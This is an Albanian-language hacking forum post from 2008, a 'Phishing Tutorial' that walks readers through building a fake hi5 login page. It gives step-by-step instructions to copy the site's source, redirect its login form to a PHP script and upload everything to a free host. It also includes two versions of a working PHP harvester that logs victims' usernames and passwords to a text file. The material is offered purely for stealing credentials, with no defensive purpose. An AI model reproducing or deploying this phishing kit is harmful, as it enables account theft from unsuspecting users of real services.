Anhack-Themostiam-HACKERS-CREW

Forumi eshte krijuar nga Themostiam.Ne kete forum do te jen aktive te gjitha temat vecanerisht ato te hacking,sepse kjo eshte arsyeja qe forumi eshte krijuar.Ju lutemi rregjistrohuni dhe na ndihmoni edhe juve duke postuar mesime te vlefshme


You are not connected. Please login or register

Phishing Tutorial [Anhack]

Shko poshtė  Mesazh [Faqja 1 e 1]

1 Phishing Tutorial [Anhack] prej Sun Apr 13, 2008 11:53 pm

[b]******************************
autori; Anhack
webi; w w w . anisplanet. tk
data; 8 prill 2008 4:06pm
******************************


Per te gjetur passworde ka shum menyra si psh;social enginering qe kerkon shum pune dhe do shum aftesi do edhe kohe,phishing esht shum e perdorur dhe trojanet qe jan te perdorura ne mase te madhe jo vetem per passworde po edhe per gjera te tjera dhe keylogger(loool)
ju thon boll tani po na thuaj si behet!loooool

OK fillojm po ju tregoj me aq sa di se si krijoni nje fake page dhe ku passwordi i fiktimes tju vij juve...

1 gjeja e par qe duhet te beni esht te zgjidhni faqen qe doni te beni fake pash ne marim hi5

2 pasi ta keni gjetur ,shkoni dhe klikoni me te djathten view source dhe bejini save ne desktop as index.htm

3 hap index.htm me notepad dhe kerko per pjesen e kodit "action"
do te de duket kodi keshtu action="/friend/login.do">

4 nryshojeni kete pjesen "/friend/login.do" me next.php
do te duket keshtu action="next.php"

5 save index.htm

6 tani duhet te hapim nje host free qe duhet te suportoj edhe php dhe marim http://www.110mb.com

7 beni login tek hosti qe krijuat dhe shkoni tek file manager

8 fshini file-n qe eshte aty e quajtur index.htm dhe beni upload ate qe kemi edituar ne index.htm

9 tani hapni notepad dhe kopjoni kete kod brenda


<?php
header("Location: http://www.hi5.com ");
$handle =

fopen("pass.txt", "a");
foreach($_GET as

$variable => $value) {
fwrite($handle,

$variable);
fwrite($handle, "=");

fwrite($handle, $value);
fwrite($handle,

"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

10 save file-in next.php

11 hapni perseri notepad dhe lere bosh dhe bejeni save emrin leje pass.txt

12 tani upload edhe kto dy filet e tjere qe krijuam ne hostin tend (next.php dhe pass.txt)
pra ne host ju do te keni keto 3 files -----index,htm --next.php---dhe pass.txt

tani provojeni---hapeni adresen tuaj www.adresajuaj.110mb.com
do tju shfaqet fajqa e hi5 plotesoni formen username dhe password,dhe te dhenat do tju vijne tek ai file qe krijuam pass.txt
KUJDES!
Nese nuk ju ka ardhur asgje ne pass.txt ateher duhet te hapni filen next.php me notepad dhe ti zevendesoni ato qe jane aty me keto:

<?php
header("Location: http://www.hi5.com");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

nese perdorni kete kodin e dyte editojeni edhe file-in pass.txt ne passwords.txt
************************************************** *****************************************
Pune te Mbare
************************************************** ******************************************
[/b]

Shiko profilin e anėtarit http://californiablogla.albanianforum.net

Mbrapsht nė krye  Mesazh [Faqja 1 e 1]

Drejtat e ktij Forumit:
Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi